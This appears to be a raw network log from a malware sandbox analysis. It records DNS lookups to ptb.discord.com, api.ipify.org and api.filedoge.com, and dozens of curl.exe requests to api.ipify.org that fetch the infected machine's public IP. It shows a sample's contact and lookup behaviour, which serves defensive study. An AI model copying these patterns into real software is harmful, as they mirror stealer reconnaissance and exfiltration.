                                  Jul 11, 2024 08:35:18.279215097 CEST8049902104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:18.279707909 CEST4990280192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:18.397113085 CEST8049902104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:18.397320986 CEST4990280192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:19.257538080 CEST4990380192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:19.375026941 CEST8049903104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:19.375195026 CEST4990380192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:19.382318974 CEST4990380192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:19.499814034 CEST8049903104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:19.533174992 CEST8049903104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:19.533513069 CEST4990380192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:19.651582003 CEST8049903104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:19.651736021 CEST4990380192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:20.022886038 CEST4990480192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:20.140461922 CEST8049904104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:20.140702963 CEST4990480192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:20.147783041 CEST4990480192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:20.265269041 CEST8049904104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:20.295651913 CEST8049904104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:20.296051979 CEST4990480192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:20.413651943 CEST8049904104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:20.413851023 CEST4990480192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:20.788305044 CEST4990580192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:20.905788898 CEST8049905104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:20.906115055 CEST4990580192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:20.913229942 CEST4990580192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:21.030704021 CEST8049905104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:21.060601950 CEST8049905104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:21.061131954 CEST4990580192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:21.179305077 CEST8049905104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:21.179508924 CEST4990580192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:21.538131952 CEST4990680192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:21.655682087 CEST8049906104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:21.656014919 CEST4990680192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:21.663075924 CEST4990680192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:21.780405045 CEST8049906104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:21.808677912 CEST8049906104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:21.809133053 CEST4990680192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:21.926893950 CEST8049906104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:21.927078009 CEST4990680192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:22.288001060 CEST4990780192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:22.405544996 CEST8049907104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:22.405719995 CEST4990780192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:22.412869930 CEST4990780192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:22.530410051 CEST8049907104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:22.567332983 CEST8049907104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:22.567725897 CEST4990780192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:22.685600042 CEST8049907104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:22.685792923 CEST4990780192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:23.037839890 CEST4990880192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:23.155139923 CEST8049908104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:23.155334949 CEST4990880192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:23.162775993 CEST4990880192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:23.280142069 CEST8049908104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:23.309861898 CEST8049908104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:23.310326099 CEST4990880192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:23.427845955 CEST8049908104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:23.428014994 CEST4990880192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:23.803344011 CEST4990980192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:23.920607090 CEST8049909104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:23.920799971 CEST4990980192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:23.928169012 CEST4990980192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:24.045378923 CEST8049909104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:24.073729038 CEST8049909104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:24.074151993 CEST4990980192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:24.192384958 CEST8049909104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:24.192609072 CEST4990980192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:24.568806887 CEST4991080192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:24.686145067 CEST8049910104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:24.686300039 CEST4991080192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:24.693607092 CEST4991080192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:24.810900927 CEST8049910104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:24.837776899 CEST8049910104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:24.838202000 CEST4991080192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:24.955710888 CEST8049910104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:24.955915928 CEST4991080192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:25.318553925 CEST4991180192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:25.435942888 CEST8049911104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:25.436127901 CEST4991180192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:25.443437099 CEST4991180192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:25.560770988 CEST8049911104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:25.591609001 CEST8049911104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:25.592056036 CEST4991180192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:25.710159063 CEST8049911104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:25.710400105 CEST4991180192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:26.052808046 CEST4991280192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:26.170238972 CEST8049912104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:26.170473099 CEST4991280192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:26.177676916 CEST4991280192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:26.295077085 CEST8049912104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:26.328619003 CEST8049912104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:26.329024076 CEST4991280192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:26.446935892 CEST8049912104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:26.447154045 CEST4991280192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:26.802666903 CEST4991380192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:26.920159101 CEST8049913104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:26.920336008 CEST4991380192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:26.927546978 CEST4991380192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:27.044959068 CEST8049913104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:27.075002909 CEST8049913104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:27.075336933 CEST4991380192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:27.193742037 CEST8049913104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:27.193990946 CEST4991380192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:27.568095922 CEST4991480192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:27.685250998 CEST8049914104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:27.685426950 CEST4991480192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:27.692954063 CEST4991480192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:27.810025930 CEST8049914104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:27.836457968 CEST8049914104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:27.836951971 CEST4991480192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:27.954334021 CEST8049914104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:27.954612017 CEST4991480192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:28.333543062 CEST4991580192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:28.451090097 CEST8049915104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:28.451323986 CEST4991580192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:28.458731890 CEST4991580192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:28.576247931 CEST8049915104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:28.608803988 CEST8049915104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:28.609123945 CEST4991580192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:28.726793051 CEST8049915104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:28.726977110 CEST4991580192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:29.145869970 CEST4991680192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:29.263215065 CEST8049916104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:29.263362885 CEST4991680192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:29.270925999 CEST4991680192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:29.388221979 CEST8049916104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:29.417548895 CEST8049916104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:29.417999983 CEST4991680192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:29.535517931 CEST8049916104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:29.535782099 CEST4991680192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:30.005933046 CEST4991780192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:30.123102903 CEST8049917104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:30.123344898 CEST4991780192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:30.130008936 CEST4991780192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:30.247104883 CEST8049917104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:30.273782969 CEST8049917104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:30.274363041 CEST4991780192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:30.392062902 CEST8049917104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:30.392258883 CEST4991780192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:30.754959106 CEST4991880192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:30.872206926 CEST8049918104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:30.872446060 CEST4991880192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:30.879827976 CEST4991880192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:30.996998072 CEST8049918104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:31.043313026 CEST8049918104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:31.043781042 CEST4991880192.168.11.20104.26.13.205
                                  Jul 11, 2024 08:35:31.161612988 CEST8049918104.26.13.205192.168.11.20
                                  Jul 11, 2024 08:35:31.161808014 CEST4991880192.168.11.20104.26.13.205
                                  TimestampSource PortDest PortSource IPDest IP
                                  Jul 11, 2024 08:33:22.157337904 CEST5791253192.168.11.201.1.1.1
                                  Jul 11, 2024 08:33:22.167021990 CEST5726253192.168.11.201.1.1.1
                                  Jul 11, 2024 08:33:22.275654078 CEST53579121.1.1.1192.168.11.20
                                  Jul 11, 2024 08:33:22.284497023 CEST53572621.1.1.1192.168.11.20
                                  Jul 11, 2024 08:33:35.990952015 CEST5911053192.168.11.201.1.1.1
                                  Jul 11, 2024 08:33:36.133531094 CEST53591101.1.1.1192.168.11.20
                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                  Jul 11, 2024 08:33:22.157337904 CEST192.168.11.201.1.1.10x874aStandard query (0)ptb.discord.comA (IP address)IN (0x0001)false
                                  Jul 11, 2024 08:33:22.167021990 CEST192.168.11.201.1.1.10x9127Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                  Jul 11, 2024 08:33:35.990952015 CEST192.168.11.201.1.1.10x10f3Standard query (0)api.filedoge.comA (IP address)IN (0x0001)false
                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                  Jul 11, 2024 08:33:22.275654078 CEST1.1.1.1192.168.11.200x874aNo error (0)ptb.discord.com162.159.136.232A (IP address)IN (0x0001)false
                                  Jul 11, 2024 08:33:22.275654078 CEST1.1.1.1192.168.11.200x874aNo error (0)ptb.discord.com162.159.138.232A (IP address)IN (0x0001)false
                                  Jul 11, 2024 08:33:22.275654078 CEST1.1.1.1192.168.11.200x874aNo error (0)ptb.discord.com162.159.128.233A (IP address)IN (0x0001)false
                                  Jul 11, 2024 08:33:22.275654078 CEST1.1.1.1192.168.11.200x874aNo error (0)ptb.discord.com162.159.135.232A (IP address)IN (0x0001)false
                                  Jul 11, 2024 08:33:22.275654078 CEST1.1.1.1192.168.11.200x874aNo error (0)ptb.discord.com162.159.137.232A (IP address)IN (0x0001)false
                                  Jul 11, 2024 08:33:22.284497023 CEST1.1.1.1192.168.11.200x9127No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                  Jul 11, 2024 08:33:22.284497023 CEST1.1.1.1192.168.11.200x9127No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                  Jul 11, 2024 08:33:22.284497023 CEST1.1.1.1192.168.11.200x9127No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                  Jul 11, 2024 08:33:36.133531094 CEST1.1.1.1192.168.11.200x10f3No error (0)api.filedoge.com49.13.193.134A (IP address)IN (0x0001)false
                                  • api.filedoge.com
                                  • api.ipify.org
                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.11.2049779104.26.13.205808640C:\Windows\System32\curl.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:33:22.467932940 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:33:22.612591982 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:33:22 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c2fbccbb53df-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.11.2049782104.26.13.205808088C:\Windows\System32\curl.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:33:37.445060968 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:33:37.592771053 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:33:37 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c35968156750-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.11.2049783104.26.13.205806408C:\Windows\System32\curl.exe
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:33:43.444237947 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:33:43.590204954 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:33:43 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c37ee9db071f-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  3192.168.11.2049784104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:33:45.272274971 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:33:45.429553032 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:33:45 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c38a5dfebfea-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  4192.168.11.2049785104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:33:46.090428114 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:33:46.241179943 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:33:46 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c38f7b737b9f-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  5192.168.11.2049786104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:33:46.949573994 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:33:47.093450069 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:33:47 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c394cd9453cd-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  6192.168.11.2049787104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:33:47.708404064 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:33:47.853693008 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:33:47 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c3998f86673a-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  7192.168.11.2049788104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:33:48.480453014 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:33:48.625683069 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:33:48 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c39e6f5169f3-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  8192.168.11.2049789104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:33:49.339847088 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:33:49.487987995 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:33:49 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c3a3cd75bcb3-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  9192.168.11.2049790104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:33:50.120793104 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:33:50.267613888 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:33:50 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c3a8acd5bd20-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  10192.168.11.2049791104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:33:50.948672056 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:33:51.096297026 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:33:51 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c3adcc1f4564-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  11192.168.11.2049792104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:33:51.698484898 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:33:51.843637943 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:33:51 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c3b2796e452f-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  12192.168.11.2049793104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:33:52.479628086 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:33:52.623770952 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:33:52 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c3b75e81451d-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  13192.168.11.2049794104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:33:53.292043924 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:33:53.439502001 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:33:53 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c3bc7b10bcba-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  14192.168.11.2049795104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:33:54.104212999 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:33:54.251724005 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:33:54 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c3c18b34674e-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  15192.168.11.2049796104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:33:54.213632107 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:33:54.361308098 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:33:54 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c3c2393d53d3-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  16192.168.11.2049797104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:33:54.979020119 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:33:55.124648094 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:33:55 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c3c6fb780d1a-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  17192.168.11.2049798104.26.13.20580
                                  TimestampBytes transferredDirectionData
                                  Jul 11, 2024 08:33:55.744462967 CEST77OUTGET / HTTP/1.1
                                  Host: api.ipify.org
                                  User-Agent: curl/7.55.1
                                  Accept: */*
                                  Jul 11, 2024 08:33:55.896641016 CEST228INHTTP/1.1 200 OK
                                  Date: Thu, 11 Jul 2024 06:33:55 GMT
                                  Content-Type: text/plain
                                  Content-Length: 12
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a16c3cbc92653cf-ATL
                                  Data Raw: 38 31 2e 31 38 31 2e 35 37 2e 39 36
                                  Data Ascii: 81.181.57.96


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  18192.168.11.2049799104.26.13.20580
                                  TimestampBytes transferredDirectionData
